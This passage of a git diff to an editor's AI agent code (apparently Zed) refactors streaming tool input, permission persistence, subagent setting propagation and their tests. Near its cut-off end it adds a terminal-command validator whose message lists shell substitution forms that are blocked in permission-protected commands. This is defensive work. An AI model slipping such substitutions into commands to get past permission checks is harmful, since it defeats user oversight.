cancellation_rx.changed().fuse() => { + if *cancellation_rx.borrow() { + log::debug!("Turn cancelled during retry delay, exiting"); + return Ok(()); + } + } + } this.update(cx, |this, _cx| { if let Some(Message::Agent(message)) = this.messages.last() { if message.tool_results.is_empty() { @@ -1874,6 +2072,33 @@ impl Thread { } } + fn process_tool_result( + this: &WeakEntity, + event_stream: &ThreadEventStream, + cx: &mut AsyncApp, + tool_result: LanguageModelToolResult, + ) -> Result<(), anyhow::Error> { + log::debug!("Tool finished {:?}", tool_result); + + event_stream.update_tool_call_fields( + &tool_result.tool_use_id, + acp::ToolCallUpdateFields::new() + .status(if tool_result.is_error { + acp::ToolCallStatus::Failed + } else { + acp::ToolCallStatus::Completed + }) + .raw_output(tool_result.output.clone()), + None, + ); + this.update(cx, |this, _cx| { + this.pending_message() + .tool_results + .insert(tool_result.tool_use_id.clone(), tool_result) + })?; + Ok(()) + } + fn handle_completion_error( &mut self, error: LanguageModelCompletionError, @@ -1969,20 +2194,21 @@ impl Thread { raw_input, json_parse_error, } => { - return Ok(Some(Task::ready( - self.handle_tool_use_json_parse_error_event( - id, - tool_name, - raw_input, - json_parse_error, - event_stream, - ), - ))); + return Ok(self.handle_tool_use_json_parse_error_event( + id, + tool_name, + raw_input, + json_parse_error, + event_stream, + cancellation_rx, + cx, + )); } UsageUpdate(usage) => { telemetry::event!( "Agent Thread Completion Usage Updated", thread_id = self.id.to_string(), + parent_thread_id = self.parent_thread_id().map(|id| id.to_string()), prompt_id = self.prompt_id.to_string(), model = self.model.as_ref().map(|m| m.telemetry_id()), model_provider = self.model.as_ref().map(|m| m.provider_id().to_string()), @@ -2077,12 +2303,12 @@ impl Thread { if !tool_use.is_input_complete { if tool.supports_input_streaming() { let running_turn = self.running_turn.as_mut()?; - if let Some(sender) = running_turn.streaming_tool_inputs.get(&tool_use.id) { + if let Some(sender) = running_turn.streaming_tool_inputs.get_mut(&tool_use.id) { sender.send_partial(tool_use.input); return None; } - let (sender, tool_input) = ToolInputSender::channel(); + let (mut sender, tool_input) = ToolInputSender::channel(); sender.send_partial(tool_use.input); running_turn .streaming_tool_inputs @@ -2104,13 +2330,13 @@ impl Thread { } } - if let Some(sender) = self + if let Some(mut sender) = self .running_turn .as_mut()? .streaming_tool_inputs .remove(&tool_use.id) { - sender.send_final(tool_use.input); + sender.send_full(tool_use.input); return None; } @@ -2183,10 +2409,12 @@ impl Thread { raw_input: Arc, json_parse_error: String, event_stream: &ThreadEventStream, - ) -> LanguageModelToolResult { + cancellation_rx: watch::Receiver, + cx: &mut Context, + ) -> Option> { let tool_use = LanguageModelToolUse { - id: tool_use_id.clone(), - name: tool_name.clone(), + id: tool_use_id, + name: tool_name, raw_input: raw_input.to_string(), input: serde_json::json!({}), is_input_complete: true, @@ -2199,14 +2427,43 @@ impl Thread { event_stream, ); - let tool_output = format!("Error parsing input JSON: {json_parse_error}"); - LanguageModelToolResult { - tool_use_id, - tool_name, - is_error: true, - content: LanguageModelToolResultContent::Text(tool_output.into()), - output: Some(serde_json::Value::String(raw_input.to_string())), + let tool = self.tool(tool_use.name.as_ref()); + + let Some(tool) = tool else { + let content = format!("No tool named {} exists", tool_use.name); + return Some(Task::ready(LanguageModelToolResult { + content: LanguageModelToolResultContent::Text(Arc::from(content)), + tool_use_id: tool_use.id, + tool_name: tool_use.name, + is_error: true, + output: None, + })); + }; + + let error_message = format!("Error parsing input JSON: {json_parse_error}"); + + if tool.supports_input_streaming() + && let Some(mut sender) = self + .running_turn + .as_mut()? + .streaming_tool_inputs + .remove(&tool_use.id) + { + sender.send_invalid_json(error_message); + return None; } + + log::debug!("Running tool {}. Received invalid JSON", tool_use.name); + let tool_input = ToolInput::invalid_json(error_message); + Some(self.run_tool( + tool, + tool_input, + tool_use.id, + tool_use.name, + event_stream, + cancellation_rx, + cx, + )) } fn send_or_update_tool_use( @@ -2218,20 +2475,18 @@ impl Thread { ) { // Ensure the last message ends in the current tool use let last_message = self.pending_message(); - let push_new_tool_use = last_message.content.last_mut().is_none_or(|content| { + + let has_tool_use = last_message.content.iter_mut().rev().any(|content| { if let AgentMessageContent::ToolUse(last_tool_use) = content { if last_tool_use.id == tool_use.id { *last_tool_use = tool_use.clone(); - false - } else { - true + return true; } - } else { - true } + false }); - if push_new_tool_use { + if !has_tool_use { event_stream.send_tool_call( &tool_use.id, &tool_use.name, @@ -2254,8 +2509,8 @@ impl Thread { } } - pub fn title(&self) -> SharedString { - self.title.clone().unwrap_or("New Thread".into()) + pub fn title(&self) -> Option { + self.title.clone() } pub fn is_generating_summary(&self) -> bool { @@ -2374,8 +2629,21 @@ impl Thread { anyhow::Ok(()) }; - if generate.await.context("failed to generate title").is_ok() { + if generate + .await + .context("failed to generate thread title") + .log_err() + .is_some() + { _ = this.update(cx, |this, cx| this.set_title(title.into(), cx)); + } else { + // Emit TitleUpdated even on failure so that the propagation + // chain (agent::Thread → NativeAgent → AcpThread) fires and + // clears any provisional title that was set before the turn. + _ = this.update(cx, |_, cx| { + cx.emit(TitleUpdated); + cx.notify(); + }); } _ = this.update(cx, |this, _| this.pending_title_generation = None); })); @@ -2449,6 +2717,13 @@ impl Thread { completion_intent: CompletionIntent, cx: &App, ) -> Result { + let completion_intent = + if self.is_subagent() && completion_intent == CompletionIntent::UserPrompt { + CompletionIntent::Subagent + } else { + completion_intent + }; + let model = self.model().context("No language model configured")?; let tools = if let Some(turn) = self.running_turn.as_ref() { turn.tools @@ -2498,12 +2773,13 @@ impl Thread { Ok(request) } - fn enabled_tools( - &self, - profile: &AgentProfileSettings, - model: &Arc, - cx: &App, - ) -> BTreeMap> { + fn enabled_tools(&self, cx: &App) -> BTreeMap> { + let Some(model) = self.model.as_ref() else { + return BTreeMap::new(); + }; + let Some(profile) = AgentSettings::get_global(cx).profiles.get(&self.profile_id) else { + return BTreeMap::new(); + }; fn truncate(tool_name: &SharedString) -> SharedString { if tool_name.len() > MAX_TOOL_NAME_LENGTH { let mut truncated = tool_name.to_string(); @@ -2514,7 +2790,8 @@ impl Thread { } } - let use_streaming_edit_tool = cx.has_flag::(); + let use_streaming_edit_tool = + cx.has_flag::() && model.supports_streaming_tools(); let mut tools = self .tools @@ -2583,6 +2860,13 @@ impl Thread { tools } + fn refresh_turn_tools(&mut self, cx: &App) { + let tools = self.enabled_tools(cx); + if let Some(turn) = self.running_turn.as_mut() { + turn.tools = tools; + } + } + fn tool(&self, name: &str) -> Option> { self.running_turn.as_ref()?.tools.get(name).cloned() } @@ -2826,7 +3110,8 @@ struct RunningTurn { /// The current event stream for the running turn. Used to report a final /// cancellation event if we cancel the turn. event_stream: ThreadEventStream, - /// The tools that were enabled for this turn. + /// The tools that are enabled for the current iteration of the turn. + /// Refreshed at the start of each iteration via `refresh_turn_tools`. tools: BTreeMap>, /// Sender to signal tool cancellation. When cancel is called, this is /// set to true so all tools can detect user-initiated cancellation. @@ -2859,8 +3144,7 @@ impl EventEmitter for Thread {} /// For streaming tools, partial JSON snapshots arrive via `.recv_partial()` as the LLM streams /// them, followed by the final complete input available through `.recv()`. pub struct ToolInput { - partial_rx: mpsc::UnboundedReceiver, - final_rx: oneshot::Receiver, + rx: mpsc::UnboundedReceiver>, _phantom: PhantomData, } @@ -2872,13 +3156,20 @@ impl ToolInput { } pub fn ready(value: serde_json::Value) -> Self { - let (partial_tx, partial_rx) = mpsc::unbounded(); - drop(partial_tx); - let (final_tx, final_rx) = oneshot::channel(); - final_tx.send(value).ok(); + let (tx, rx) = mpsc::unbounded(); + tx.unbounded_send(ToolInputPayload::Full(value)).ok(); + Self { + rx, + _phantom: PhantomData, + } + } + + pub fn invalid_json(error_message: String) -> Self { + let (tx, rx) = mpsc::unbounded(); + tx.unbounded_send(ToolInputPayload::InvalidJson { error_message }) + .ok(); Self { - partial_rx, - final_rx, + rx, _phantom: PhantomData, } } @@ -2892,61 +3183,89 @@ impl ToolInput { /// Wait for the final deserialized input, ignoring all partial updates. /// Non-streaming tools can use this to wait until the whole input is available. pub async fn recv(mut self) -> Result { - // Drain any remaining partials - while self.partial_rx.next().await.is_some() {} + while let Ok(value) = self.next().await { + match value { + ToolInputPayload::Full(value) => return Ok(value), + ToolInputPayload::Partial(_) => {} + ToolInputPayload::InvalidJson { error_message } => { + return Err(anyhow!(error_message)); + } + } + } + Err(anyhow!("tool input was not fully received")) + } + + pub async fn next(&mut self) -> Result> { let value = self - .final_rx + .rx + .next() .await - .map_err(|_| anyhow!("tool input sender was dropped before sending final input"))?; - serde_json::from_value(value).map_err(Into::into) - } + .ok_or_else(|| anyhow!("tool input was not fully received"))?; - /// Returns the next partial JSON snapshot, or `None` when input is complete. - /// Once this returns `None`, call `recv()` to get the final input. - pub async fn recv_partial(&mut self) -> Option { - self.partial_rx.next().await + Ok(match value { + ToolInputPayload::Partial(payload) => ToolInputPayload::Partial(payload), + ToolInputPayload::Full(payload) => { + ToolInputPayload::Full(serde_json::from_value(payload)?) + } + ToolInputPayload::InvalidJson { error_message } => { + ToolInputPayload::InvalidJson { error_message } + } + }) } fn cast(self) -> ToolInput { ToolInput { - partial_rx: self.partial_rx, - final_rx: self.final_rx, + rx: self.rx, _phantom: PhantomData, } } } +pub enum ToolInputPayload { + Partial(serde_json::Value), + Full(T), + InvalidJson { error_message: String }, +} + pub struct ToolInputSender { - partial_tx: mpsc::UnboundedSender, - final_tx: Option>, + has_received_final: bool, + tx: mpsc::UnboundedSender>, } impl ToolInputSender { pub(crate) fn channel() -> (Self, ToolInput) { - let (partial_tx, partial_rx) = mpsc::unbounded(); - let (final_tx, final_rx) = oneshot::channel(); + let (tx, rx) = mpsc::unbounded(); let sender = Self { - partial_tx, - final_tx: Some(final_tx), + tx, + has_received_final: false, }; let input = ToolInput { - partial_rx, - final_rx, + rx, _phantom: PhantomData, }; (sender, input) } - pub(crate) fn send_partial(&self, value: serde_json::Value) { - self.partial_tx.unbounded_send(value).ok(); + pub(crate) fn has_received_final(&self) -> bool { + self.has_received_final } - pub(crate) fn send_final(mut self, value: serde_json::Value) { - // Close the partial channel so recv_partial() returns None - self.partial_tx.close_channel(); - if let Some(final_tx) = self.final_tx.take() { - final_tx.send(value).ok(); - } + pub fn send_partial(&mut self, payload: serde_json::Value) { + self.tx + .unbounded_send(ToolInputPayload::Partial(payload)) + .ok(); + } + + pub fn send_full(&mut self, payload: serde_json::Value) { + self.has_received_final = true; + self.tx.unbounded_send(ToolInputPayload::Full(payload)).ok(); + } + + pub fn send_invalid_json(&mut self, error_message: String) { + self.has_received_final = true; + self.tx + .unbounded_send(ToolInputPayload::InvalidJson { error_message }) + .ok(); } } @@ -3218,6 +3537,10 @@ impl ThreadEventStream { .ok(); } + fn send_plan(&self, plan: acp::Plan) { + self.0.unbounded_send(Ok(ThreadEvent::Plan(plan))).ok(); + } + fn send_retry(&self, status: acp_thread::RetryStatus) { self.0.unbounded_send(Ok(ThreadEvent::Retry(status))).ok(); } @@ -3353,6 +3676,10 @@ impl ToolCallEventStream { .ok(); } + pub fn update_plan(&self, plan: acp::Plan) { + self.stream.send_plan(plan); + } + /// Authorize a third-party tool (e.g., MCP tool from a context server). /// /// Unlike built-in tools, third-party tools don't support pattern-based permissions. @@ -3406,6 +3733,7 @@ impl ToolCallEventStream { format!("Always for {} MCP tool", display_name), acp::PermissionOptionKind::RejectAlways, ), + sub_patterns: vec![], }, acp_thread::PermissionOptionChoice { allow: acp::PermissionOption::new( @@ -3418,6 +3746,7 @@ impl ToolCallEventStream { "Only this time", acp::PermissionOptionKind::RejectOnce, ), + sub_patterns: vec![], }, ]), response: response_tx, @@ -3433,40 +3762,13 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - if response_str == format!("always_allow_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); - } - if response_str == format!("always_deny_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - if response_str == "allow" { - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } - - Err(anyhow!("Permission to run tool denied by user")) }) } @@ -3476,8 +3778,6 @@ impl ToolCallEventStream { context: ToolPermissionContext, cx: &mut App, ) -> Task> { - use settings::ToolPermissionMode; - let options = context.build_permission_options(); let (response_tx, response_rx) = oneshot::channel(); @@ -3504,90 +3804,118 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - // Handle "always allow tool" - e.g., "always_allow:terminal" - if let Some(tool) = response_str.strip_prefix("always_allow:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } + }) + } - // Handle "always deny tool" - e.g., "always_deny:terminal" - if let Some(tool) = response_str.strip_prefix("always_deny:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - // Handle "always allow pattern" - e.g., "always_allow_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_allow_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_allow_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always allow pattern: missing newline separator in '{rest}'"); - } - return Ok(()); - } + /// Interprets a `SelectedPermissionOutcome` and persists any settings changes. + /// Returns `true` if the tool call should be allowed, `false` if denied. + fn persist_permission_outcome( + outcome: &acp_thread::SelectedPermissionOutcome, + fs: Option>, + cx: &AsyncApp, + ) -> bool { + let option_id = outcome.option_id.0.as_ref(); + + let always_permission = option_id + .strip_prefix("always_allow:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + .or_else(|| { + option_id + .strip_prefix("always_deny:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }) + .or_else(|| { + option_id + .strip_prefix("always_allow_mcp:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + }) + .or_else(|| { + option_id + .strip_prefix("always_deny_mcp:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }); - // Handle "always deny pattern" - e.g., "always_deny_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_deny_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_deny_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always deny pattern: missing newline separator in '{rest}'"); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + if let Some((tool, mode)) = always_permission { + let params = outcome.params.as_ref(); + Self::persist_always_permission(tool, mode, params, fs, cx); + return mode == ToolPermissionMode::Allow; + } - // Handle simple "allow" (allow once) - if response_str == "allow" { - return Ok(()); - } + // Handle simple "allow" / "deny" (once, no persistence) + if option_id == "allow" || option_id == "deny" { + debug_assert!( + outcome.params.is_none(), + "unexpected params for once-only permission" + ); + return option_id == "allow"; + } - // Handle simple "deny" (deny once) - Err(anyhow!("Permission to run tool denied by user")) - }) + debug_assert!(false, "unexpected permission option_id: {option_id}"); + false + } + + /// Persists an "always allow" or "always deny" permission, using sub_patterns + /// from params when present. + fn persist_always_permission( + tool: &str, + mode: ToolPermissionMode, + params: Option<&acp_thread::SelectedPermissionParams>, + fs: Option>, + cx: &AsyncApp, + ) { + let Some(fs) = fs else { + return; + }; + + match params { + Some(acp_thread::SelectedPermissionParams::Terminal { + patterns: sub_patterns, + }) => { + debug_assert!( + !sub_patterns.is_empty(), + "empty sub_patterns for tool {tool} — callers should pass None instead" + ); + let tool = tool.to_string(); + let sub_patterns = sub_patterns.clone(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + let agent = settings.agent.get_or_insert_default(); + for pattern in sub_patterns { + match mode { + ToolPermissionMode::Allow => { + agent.add_tool_allow_pattern(&tool, pattern); + } + ToolPermissionMode::Deny => { + agent.add_tool_deny_pattern(&tool, pattern); + } + // If there's no matching pattern this will + // default to confirm, so falling through is + // fine here. + ToolPermissionMode::Confirm => (), + } + } + }); + }); + } + None => { + let tool = tool.to_string(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + settings + .agent + .get_or_insert_default() + .set_tool_default_permission(&tool, mode); + }); + }); + } + } } } @@ -3640,6 +3968,15 @@ impl ToolCallEventStreamReceiver { panic!("Expected terminal but got: {:?}", event); } } + + pub async fn expect_plan(&mut self) -> acp::Plan { + let event = self.0.next().await; + if let Some(Ok(ThreadEvent::Plan(plan))) = event { + plan + } else { + panic!("Expected plan but got: {:?}", event); + } + } } #[cfg(any(test, feature = "test-support"))] @@ -3755,6 +4092,7 @@ mod tests { use super::*; use gpui::TestAppContext; use language_model::LanguageModelToolUseId; + use language_model::fake_provider::FakeLanguageModel; use serde_json::json; use std::sync::Arc; @@ -3792,74 +4130,259 @@ mod tests { }) } - #[gpui::test] - async fn test_handle_tool_use_json_parse_error_adds_tool_use_to_content( + fn setup_parent_with_subagents( cx: &mut TestAppContext, - ) { - let (thread, event_stream) = setup_thread_for_test(cx).await; + parent: &Entity, + count: usize, + ) -> Vec> { + cx.update(|cx| { + let mut subagents = Vec::new(); + for _ in 0..count { + let subagent = cx.new(|cx| Thread::new_subagent(parent, cx)); + parent.update(cx, |thread, _cx| { + thread.register_running_subagent(subagent.downgrade()); + }); + subagents.push(subagent); + } + subagents + }) + } + + #[gpui::test] + async fn test_set_model_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + let new_model: Arc = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "new-model", + "New Model", + false, + )); cx.update(|cx| { - thread.update(cx, |thread, _cx| { - let tool_use_id = LanguageModelToolUseId::from("test_tool_id"); - let tool_name: Arc = Arc::from("test_tool"); - let raw_input: Arc = Arc::from("{invalid json"); - let json_parse_error = "expected value at line 1 column 1".to_string(); - - // Call the function under test - let result = thread.handle_tool_use_json_parse_error_event( - tool_use_id.clone(), - tool_name.clone(), - raw_input.clone(), - json_parse_error, - &event_stream, + parent.update(cx, |thread, cx| { + thread.set_model(new_model, cx); + }); + + for subagent in &subagents { + let subagent_model_id = subagent.read(cx).model().unwrap().id(); + assert_eq!( + subagent_model_id.0.as_ref(), + "new-model", + "Subagent model should match parent model after set_model" ); + } + }); + } - // Verify the result is an error - assert!(result.is_error); - assert_eq!(result.tool_use_id, tool_use_id); - assert_eq!(result.tool_name, tool_name); - assert!(matches!( - result.content, - LanguageModelToolResultContent::Text(_) - )); + #[gpui::test] + async fn test_set_summarization_model_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + let summary_model: Arc = + Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "summary-model", + "Summary Model", + false, + )); - // Verify the tool use was added to the message content - { - let last_message = thread.pending_message(); - assert_eq!( - last_message.content.len(), - 1, - "Should have one tool_use in content" - ); + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_summarization_model(Some(summary_model), cx); + }); - match &last_message.content[0] { - AgentMessageContent::ToolUse(tool_use) => { - assert_eq!(tool_use.id, tool_use_id); - assert_eq!(tool_use.name, tool_name); - assert_eq!(tool_use.raw_input, raw_input.to_string()); - assert!(tool_use.is_input_complete); - // Should fall back to empty object for invalid JSON - assert_eq!(tool_use.input, json!({})); - } - _ => panic!("Expected ToolUse content"), - } - } + for subagent in &subagents { + let subagent_summary_id = subagent.read(cx).summarization_model().unwrap().id(); + assert_eq!( + subagent_summary_id.0.as_ref(), + "summary-model", + "Subagent summarization model should match parent after set_summarization_model" + ); + } + }); + } - // Insert the tool result (simulating what the caller does) - thread - .pending_message() - .tool_results - .insert(result.tool_use_id.clone(), result); + #[gpui::test] + async fn test_set_thinking_enabled_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); - // Verify the tool result was added - let last_message = thread.pending_message(); + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(true, cx); + }); + + for subagent in &subagents { + assert!( + subagent.read(cx).thinking_enabled(), + "Subagent thinking should be enabled after parent enables it" + ); + } + + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(false, cx); + }); + + for subagent in &subagents { + assert!( + !subagent.read(cx).thinking_enabled(), + "Subagent thinking should be disabled after parent disables it" + ); + } + }); + } + + #[gpui::test] + async fn test_set_thinking_effort_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_effort(Some("high".to_string()), cx); + }); + + for subagent in &subagents { assert_eq!( - last_message.tool_results.len(), - 1, - "Should have one tool_result" + subagent.read(cx).thinking_effort().map(|s| s.as_str()), + Some("high"), + "Subagent thinking effort should match parent" ); - assert!(last_message.tool_results.contains_key(&tool_use_id)); + } + + parent.update(cx, |thread, cx| { + thread.set_thinking_effort(None, cx); + }); + + for subagent in &subagents { + assert_eq!( + subagent.read(cx).thinking_effort(), + None, + "Subagent thinking effort should be None after parent clears it" + ); + } + }); + } + + #[gpui::test] + async fn test_set_speed_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_speed(Speed::Fast, cx); + }); + + for subagent in &subagents { + assert_eq!( + subagent.read(cx).speed(), + Some(Speed::Fast), + "Subagent speed should match parent after set_speed" + ); + } + }); + } + + #[gpui::test] + async fn test_dropped_subagent_does_not_panic(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 1); + + // Drop the subagent so the WeakEntity can no longer be upgraded + drop(subagents); + + // Should not panic even though the subagent was dropped + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(true, cx); + thread.set_speed(Speed::Fast, cx); + thread.set_thinking_effort(Some("high".to_string()), cx); }); }); } + + #[gpui::test] + async fn test_handle_tool_use_json_parse_error_adds_tool_use_to_content( + cx: &mut TestAppContext, + ) { + let (thread, event_stream) = setup_thread_for_test(cx).await; + + let tool_use_id = LanguageModelToolUseId::from("test_tool_id"); + let tool_name: Arc = Arc::from("test_tool"); + let raw_input: Arc = Arc::from("{invalid json"); + let json_parse_error = "expected value at line 1 column 1".to_string(); + + let (_cancellation_tx, cancellation_rx) = watch::channel(false); + + let result = cx + .update(|cx| { + thread.update(cx, |thread, cx| { + // Call the function under test + thread + .handle_tool_use_json_parse_error_event( + tool_use_id.clone(), + tool_name.clone(), + raw_input.clone(), + json_parse_error, + &event_stream, + cancellation_rx, + cx, + ) + .unwrap() + }) + }) + .await; + + // Verify the result is an error + assert!(result.is_error); + assert_eq!(result.tool_use_id, tool_use_id); + assert_eq!(result.tool_name, tool_name); + assert!(matches!( + result.content, + LanguageModelToolResultContent::Text(_) + )); + + thread.update(cx, |thread, _cx| { + // Verify the tool use was added to the message content + { + let last_message = thread.pending_message(); + assert_eq!( + last_message.content.len(), + 1, + "Should have one tool_use in content" + ); + + match &last_message.content[0] { + AgentMessageContent::ToolUse(tool_use) => { + assert_eq!(tool_use.id, tool_use_id); + assert_eq!(tool_use.name, tool_name); + assert_eq!(tool_use.raw_input, raw_input.to_string()); + assert!(tool_use.is_input_complete); + // Should fall back to empty object for invalid JSON + assert_eq!(tool_use.input, json!({})); + } + _ => panic!("Expected ToolUse content"), + } + } + + // Insert the tool result (simulating what the caller does) + thread + .pending_message() + .tool_results + .insert(result.tool_use_id.clone(), result); + + // Verify the tool result was added + let last_message = thread.pending_message(); + assert_eq!( + last_message.tool_results.len(), + 1, + "Should have one tool_result" + ); + assert!(last_message.tool_results.contains_key(&tool_use_id)); + }) + } } diff --git a/crates/agent/src/thread_store.rs b/crates/agent/src/thread_store.rs index 5cdce12125da8f7d26677388169e899f94b7e7f1..e62ff78871c65311627aab8f6a6e3c00481a0c2b 100644 --- a/crates/agent/src/thread_store.rs +++ b/crates/agent/src/thread_store.rs @@ -22,6 +22,10 @@ impl ThreadStore { cx.global::().0.clone() } + pub fn try_global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } + pub fn new(cx: &mut Context) -> Self { let this = Self { threads: Vec::new(), @@ -87,14 +91,15 @@ impl ThreadStore { let database_connection = ThreadsDatabase::connect(cx); cx.spawn(async move |this, cx| { let database = database_connection.await.map_err(|err| anyhow!(err))?; - let threads = database - .list_threads() - .await? - .into_iter() - .filter(|thread| thread.parent_session_id.is_none()) - .collect::>(); + let all_threads = database.list_threads().await?; this.update(cx, |this, cx| { - this.threads = threads; + this.threads.clear(); + for thread in all_threads { + if thread.parent_session_id.is_some() { + continue; + } + this.threads.push(thread); + } cx.notify(); }) }) @@ -109,11 +114,8 @@ impl ThreadStore { self.threads.iter().cloned() } - /// Returns threads whose folder_paths match the given paths exactly. - pub fn threads_for_paths(&self, paths: &PathList) -> impl Iterator { - self.threads - .iter() - .filter(move |thread| &thread.folder_paths == paths) + pub fn entry_ids(&self) -> impl Iterator + '_ { + self.threads.iter().map(|t| t.id.clone()) } } @@ -145,6 +147,8 @@ mod tests { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } @@ -288,50 +292,4 @@ mod tests { assert_eq!(entries[0].id, first_id); assert_eq!(entries[1].id, second_id); } - - #[gpui::test] - async fn test_threads_for_paths_filters_correctly(cx: &mut TestAppContext) { - let thread_store = cx.new(|cx| ThreadStore::new(cx)); - cx.run_until_parked(); - - let project_a_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-a")]); - let project_b_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-b")]); - - let thread_a = make_thread( - "Thread in A", - Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), - ); - let thread_b = make_thread( - "Thread in B", - Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap(), - ); - let thread_a_id = session_id("thread-a"); - let thread_b_id = session_id("thread-b"); - - let save_a = thread_store.update(cx, |store, cx| { - store.save_thread(thread_a_id.clone(), thread_a, project_a_paths.clone(), cx) - }); - save_a.await.unwrap(); - - let save_b = thread_store.update(cx, |store, cx| { - store.save_thread(thread_b_id.clone(), thread_b, project_b_paths.clone(), cx) - }); - save_b.await.unwrap(); - - cx.run_until_parked(); - - thread_store.read_with(cx, |store, _cx| { - let a_threads: Vec<_> = store.threads_for_paths(&project_a_paths).collect(); - assert_eq!(a_threads.len(), 1); - assert_eq!(a_threads[0].id, thread_a_id); - - let b_threads: Vec<_> = store.threads_for_paths(&project_b_paths).collect(); - assert_eq!(b_threads.len(), 1); - assert_eq!(b_threads[0].id, thread_b_id); - - let nonexistent = PathList::new(&[std::path::PathBuf::from("/nonexistent")]); - let no_threads: Vec<_> = store.threads_for_paths(&nonexistent).collect(); - assert!(no_threads.is_empty()); - }); - } } diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 79564bbddea7063d00e18d97c8eab89533b20da5..58e779da59aef176464839ed6f2d6a5c16e4bc12 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -2,13 +2,19 @@ use crate::AgentTool; use crate::tools::TerminalTool; use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules}; use settings::ToolPermissionMode; -use shell_command_parser::extract_commands; +use shell_command_parser::{ + TerminalCommandValidation, extract_commands, validate_terminal_command, +}; use std::path::{Component, Path}; use std::sync::LazyLock; use util::shell::ShellKind; const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \ harmful to be allowed, and cannot be overridden by settings."; +const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \ + allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \ + ${VAR}, $(...), backticks, $((...)), <(...), and >(...). Resolve those values before calling terminal, or ask \ + the user for the literal value to use."; /// Security rules that are always enforced and 